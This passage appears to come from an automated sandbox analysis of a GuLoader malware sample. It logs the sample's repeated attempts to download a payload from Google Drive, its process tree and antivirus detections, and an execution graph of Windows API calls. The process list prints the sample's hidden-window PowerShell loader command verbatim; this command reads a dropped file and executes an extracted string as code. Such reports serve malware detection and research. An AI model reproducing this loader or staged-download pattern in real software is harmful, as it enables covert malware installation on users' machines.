                                                                                  2025-01-11 04:30:09 UTC | 1652              | IN        | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fDZm7-2Nbl3VJVcmRkJtZQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                  34         | 192.168.2.4 | 49332       | 216.58.206.46   | 443              | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp               | Bytes transferred | Direction | Data
                                                                                  2025-01-11 04:30:10 UTC | 422               | OUT       | GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:11 UTC | 1920              | IN        | HTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:11 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Content-Security-Policy: script-src 'nonce-RI1i7CYsOzWEVMSm1-99mA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  35192.168.2.449333142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:30:11 UTC | 464 | OUT | GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
2025-01-11 04:30:12 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgTZlFIqQx6lCF-u26JcAzTAF9Rkf_PAgvC82luLTwp2jnX7smWktigueoDKWbuJCEvI1vcIMZM
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:12 GMT
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-3T_8F_uCxaOzKx65EJOp1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
2025-01-11 04:30:12 UTC | 1652 | IN | Data Raw: (hex dump omitted; ASCII rendering follows)
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HXG1z0zPxiWn-nr8KhT92g">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49334 | 216.58.206.46 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:30:13 UTC | 422 | OUT | GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
2025-01-11 04:30:13 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:13 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Security-Policy: script-src 'nonce-w7Gz0Hj0sGqjhg3hojBBsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49335 | 142.250.185.129 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:30:14 UTC | 464 | OUT | GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
2025-01-11 04:30:14 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgQor1AMDJBUT27l7U8xZmGPGFtthlOqL_2FHP4CKwhb74vZ0dv2WL4bEvPubnB75BKoE_b911M
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:14 GMT
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-WTsq79d1HfDmzx-pdQ1a_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
2025-01-11 04:30:14 UTC | 1652 | IN | Data Raw: (hex dump omitted; ASCII rendering follows)
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wPgZcFeLVko1FJlUcucPIQ">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49336 | 216.58.206.46 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:30:15 UTC | 422 | OUT | GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
2025-01-11 04:30:15 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:15 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Content-Security-Policy: script-src 'nonce-zYK3zcn3sDoCQs5JLBhZEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close



                                                                                  Target ID:0
                                                                                  Start time:23:28:09
                                                                                  Start date:10/01/2025
                                                                                  Path:C:\Users\user\Desktop\AM983ebb5F.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\AM983ebb5F.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:732'452 bytes
                                                                                  MD5 hash:03ABC55B8081DADF39D55EBD481BEF1C
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:1
                                                                                  Start time:23:28:10
                                                                                  Start date:10/01/2025
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:powershell.exe -windowstyle hidden "$Celeries=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Alternere.Mor';$Enedirektrs=$Celeries.SubString(13958,3);.$Enedirektrs($Celeries) "
                                                                                  Imagebase:0xbc0000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:23:28:10
                                                                                  Start date:10/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:23:29:16
                                                                                  Start date:10/01/2025
                                                                                  Path:C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Anthranil.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:732'452 bytes
                                                                                  MD5 hash:03ABC55B8081DADF39D55EBD481BEF1C
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.3009478955.000000000363A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 50%, ReversingLabs
• Detection: 69%, Virustotal
                                                                                  Reputation:low
                                                                                  Has exited:false


                                                                                    Execution Graph

                                                                                    Execution Coverage:22.5%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:16.5%
                                                                                    Total number of Nodes:1350
                                                                                    Total number of Limit Nodes:30
FindFirstFileW 3035->3039 3036->3035 3036->3039 3038 405deb 3107 405e26 lstrlenW CharPrevW 3038->3107 3041 405dc2 3039->3041 3042 405d1e 3039->3042 3041->3027 3044 405da5 FindNextFileW 3042->3044 3054 405c63 64 API calls 3042->3054 3056 4055dc 28 API calls 3042->3056 3080 406557 lstrcpynW 3042->3080 3081 405c1b 3042->3081 3089 4055dc 3042->3089 3100 406317 MoveFileExW 3042->3100 3044->3042 3048 405dbb FindClose 3044->3048 3045 405c1b 5 API calls 3047 405dfd 3045->3047 3049 405e17 3047->3049 3050 405e01 3047->3050 3048->3041 3052 4055dc 28 API calls 3049->3052 3050->3026 3053 4055dc 28 API calls 3050->3053 3052->3026 3055 405e0e 3053->3055 3054->3042 3057 406317 40 API calls 3055->3057 3056->3044 3058 405e15 3057->3058 3058->3026 3110 406557 lstrcpynW 3061->3110 3063 405f3f 3111 405ed1 CharNextW CharNextW 3063->3111 3066 405c83 3066->3024 3066->3025 3067 406805 5 API calls 3073 405f55 3067->3073 3068 405f86 lstrlenW 3069 405f91 3068->3069 3068->3073 3071 405e26 3 API calls 3069->3071 3070 4068b4 2 API calls 3070->3073 3072 405f96 GetFileAttributesW 3071->3072 3072->3066 3073->3066 3073->3068 3073->3070 3074 405e72 2 API calls 3073->3074 3074->3068 3075->3029 3077 405e80 3076->3077 3078 405e92 3077->3078 3079 405e86 CharPrevW 3077->3079 3078->3032 3079->3077 3079->3078 3080->3042 3117 406022 GetFileAttributesW 3081->3117 3084 405c48 3084->3042 3085 405c36 RemoveDirectoryW 3087 405c44 3085->3087 3086 405c3e DeleteFileW 3086->3087 3087->3084 3088 405c54 SetFileAttributesW 3087->3088 3088->3084 3090 4055f7 3089->3090 3099 405699 3089->3099 3091 405613 lstrlenW 3090->3091 3092 406594 21 API calls 3090->3092 3093 405621 lstrlenW 3091->3093 3094 40563c 3091->3094 3092->3091 3095 405633 lstrcatW 3093->3095 3093->3099 3096 405642 SetWindowTextW 3094->3096 3097 40564f 3094->3097 3095->3094 3096->3097 3098 405655 SendMessageW SendMessageW SendMessageW 3097->3098 3097->3099 3098->3099 3099->3042 3101 406338 3100->3101 3102 40632b 3100->3102 3101->3042 3120 40619d 3102->3120 
3105 405de7 3104->3105 3106 4068ca FindClose 3104->3106 3105->3026 3105->3038 3106->3105 3108 405e42 lstrcatW 3107->3108 3109 405df1 3107->3109 3108->3109 3109->3045 3110->3063 3112 405eee 3111->3112 3114 405f00 3111->3114 3113 405efb CharNextW 3112->3113 3112->3114 3116 405f24 3113->3116 3115 405e53 CharNextW 3114->3115 3114->3116 3115->3114 3116->3066 3116->3067 3118 405c27 3117->3118 3119 406034 SetFileAttributesW 3117->3119 3118->3084 3118->3085 3118->3086 3119->3118 3121 4061f3 GetShortPathNameW 3120->3121 3122 4061cd 3120->3122 3123 406312 3121->3123 3124 406208 3121->3124 3147 406047 GetFileAttributesW CreateFileW 3122->3147 3123->3101 3124->3123 3126 406210 wsprintfA 3124->3126 3128 406594 21 API calls 3126->3128 3127 4061d7 CloseHandle GetShortPathNameW 3127->3123 3129 4061eb 3127->3129 3130 406238 3128->3130 3129->3121 3129->3123 3148 406047 GetFileAttributesW CreateFileW 3130->3148 3132 406245 3132->3123 3133 406254 GetFileSize GlobalAlloc 3132->3133 3134 406276 3133->3134 3135 40630b CloseHandle 3133->3135 3149 4060ca ReadFile 3134->3149 3135->3123 3140 406295 lstrcpyA 3143 4062b7 3140->3143 3141 4062a9 3142 405fac 4 API calls 3141->3142 3142->3143 3144 4062ee SetFilePointer 3143->3144 3156 4060f9 WriteFile 3144->3156 3147->3127 3148->3132 3150 4060e8 3149->3150 3150->3135 3151 405fac lstrlenA 3150->3151 3152 405fed lstrlenA 3151->3152 3153 405ff5 3152->3153 3154 405fc6 lstrcmpiA 3152->3154 3153->3140 3153->3141 3154->3153 3155 405fe4 CharNextA 3154->3155 3155->3152 3157 406117 GlobalFree 3156->3157 3157->3135 3158 4015c6 3159 402dab 21 API calls 3158->3159 3160 4015cd 3159->3160 3161 405ed1 4 API calls 3160->3161 3173 4015d6 3161->3173 3162 401636 3164 401668 3162->3164 3165 40163b 3162->3165 3163 405e53 CharNextW 3163->3173 3168 401423 28 API calls 3164->3168 3183 401423 3165->3183 3175 401660 3168->3175 3172 40164f SetCurrentDirectoryW 3172->3175 3173->3162 3173->3163 3174 40161c GetFileAttributesW 3173->3174 3177 405b22 3173->3177 3180 405aab 
CreateDirectoryW 3173->3180 3187 405b05 CreateDirectoryW 3173->3187 3174->3173 3178 40694b 5 API calls 3177->3178 3179 405b29 3178->3179 3179->3173 3181 405af7 3180->3181 3182 405afb GetLastError 3180->3182 3181->3173 3182->3181 3184 4055dc 28 API calls 3183->3184 3185 401431 3184->3185 3186 406557 lstrcpynW 3185->3186 3186->3172 3188 405b15 3187->3188 3189 405b19 GetLastError 3187->3189 3188->3173 3189->3188 3847 404646 lstrlenW 3848 404665 3847->3848 3849 404667 WideCharToMultiByte 3847->3849 3848->3849 3850 4049c7 3851 4049f3 3850->3851 3852 404a04 3850->3852 3911 405b9b GetDlgItemTextW 3851->3911 3853 404a10 GetDlgItem 3852->3853 3856 404a6f 3852->3856 3855 404a24 3853->3855 3860 404a38 SetWindowTextW 3855->3860 3863 405ed1 4 API calls 3855->3863 3857 404b53 3856->3857 3865 406594 21 API calls 3856->3865 3909 404d02 3856->3909 3857->3909 3913 405b9b GetDlgItemTextW 3857->3913 3858 4049fe 3859 406805 5 API calls 3858->3859 3859->3852 3864 4044d6 22 API calls 3860->3864 3862 40453d 8 API calls 3867 404d16 3862->3867 3868 404a2e 3863->3868 3869 404a54 3864->3869 3870 404ae3 SHBrowseForFolderW 3865->3870 3866 404b83 3871 405f2e 18 API calls 3866->3871 3868->3860 3875 405e26 3 API calls 3868->3875 3872 4044d6 22 API calls 3869->3872 3870->3857 3873 404afb CoTaskMemFree 3870->3873 3874 404b89 3871->3874 3876 404a62 3872->3876 3877 405e26 3 API calls 3873->3877 3914 406557 lstrcpynW 3874->3914 3875->3860 3912 40450b SendMessageW 3876->3912 3882 404b08 3877->3882 3880 404ba0 3885 40694b 5 API calls 3880->3885 3881 404a68 3884 40694b 5 API calls 3881->3884 3883 404b3f SetDlgItemTextW 3882->3883 3886 406594 21 API calls 3882->3886 3883->3857 3884->3856 3892 404ba7 3885->3892 3887 404b27 lstrcmpiW 3886->3887 3887->3883 3889 404b38 lstrcatW 3887->3889 3888 404be8 3915 406557 lstrcpynW 3888->3915 3889->3883 3891 404bef 3893 405ed1 4 API calls 3891->3893 3892->3888 3897 405e72 2 API calls 3892->3897 3898 404c40 3892->3898 3894 404bf5 GetDiskFreeSpaceW 3893->3894 3896 404c19 
MulDiv 3894->3896 3894->3898 3896->3898 3897->3892 3899 404cb1 3898->3899 3901 404e4c 24 API calls 3898->3901 3900 404cd4 3899->3900 3903 40140b 2 API calls 3899->3903 3916 4044f8 KiUserCallbackDispatcher 3900->3916 3902 404c9e 3901->3902 3904 404cb3 SetDlgItemTextW 3902->3904 3905 404ca3 3902->3905 3903->3900 3904->3899 3907 404d83 24 API calls 3905->3907 3907->3899 3908 404cf0 3908->3909 3917 404920 3908->3917 3909->3862 3911->3858 3912->3881 3913->3866 3914->3880 3915->3891 3916->3908 3918 404933 SendMessageW 3917->3918 3919 40492e 3917->3919 3918->3909 3919->3918 3920 401c48 3921 402d89 21 API calls 3920->3921 3922 401c4f 3921->3922 3923 402d89 21 API calls 3922->3923 3924 401c5c 3923->3924 3925 401c71 3924->3925 3926 402dab 21 API calls 3924->3926 3927 402dab 21 API calls 3925->3927 3931 401c81 3925->3931 3926->3925 3927->3931 3928 401cd8 3930 402dab 21 API calls 3928->3930 3929 401c8c 3932 402d89 21 API calls 3929->3932 3933 401cdd 3930->3933 3931->3928 3931->3929 3934 401c91 3932->3934 3935 402dab 21 API calls 3933->3935 3936 402d89 21 API calls 3934->3936 3938 401ce6 FindWindowExW 3935->3938 3937 401c9d 3936->3937 3939 401cc8 SendMessageW 3937->3939 3940 401caa SendMessageTimeoutW 3937->3940 3941 401d08 3938->3941 3939->3941 3940->3941 3942 4028c9 3943 4028cf 3942->3943 3944 4028d7 FindClose 3943->3944 3945 402c2f 3943->3945 3944->3945 3949 405550 3950 405560 3949->3950 3951 405574 3949->3951 3953 405566 3950->3953 3954 4055bd 3950->3954 3952 40557c IsWindowVisible 3951->3952 3960 405593 3951->3960 3952->3954 3956 405589 3952->3956 3955 404522 SendMessageW 3953->3955 3957 4055c2 CallWindowProcW 3954->3957 3958 405570 3955->3958 3959 404e91 5 API calls 3956->3959 3957->3958 3959->3960 3960->3957 3961 404f11 4 API calls 3960->3961 3961->3954 3962 4016d1 3963 402dab 21 API calls 3962->3963 3964 4016d7 GetFullPathNameW 3963->3964 3965 4016f1 3964->3965 3971 401713 3964->3971 3968 4068b4 2 API calls 3965->3968 3965->3971 3966 401728 GetShortPathNameW 3967 402c2f 
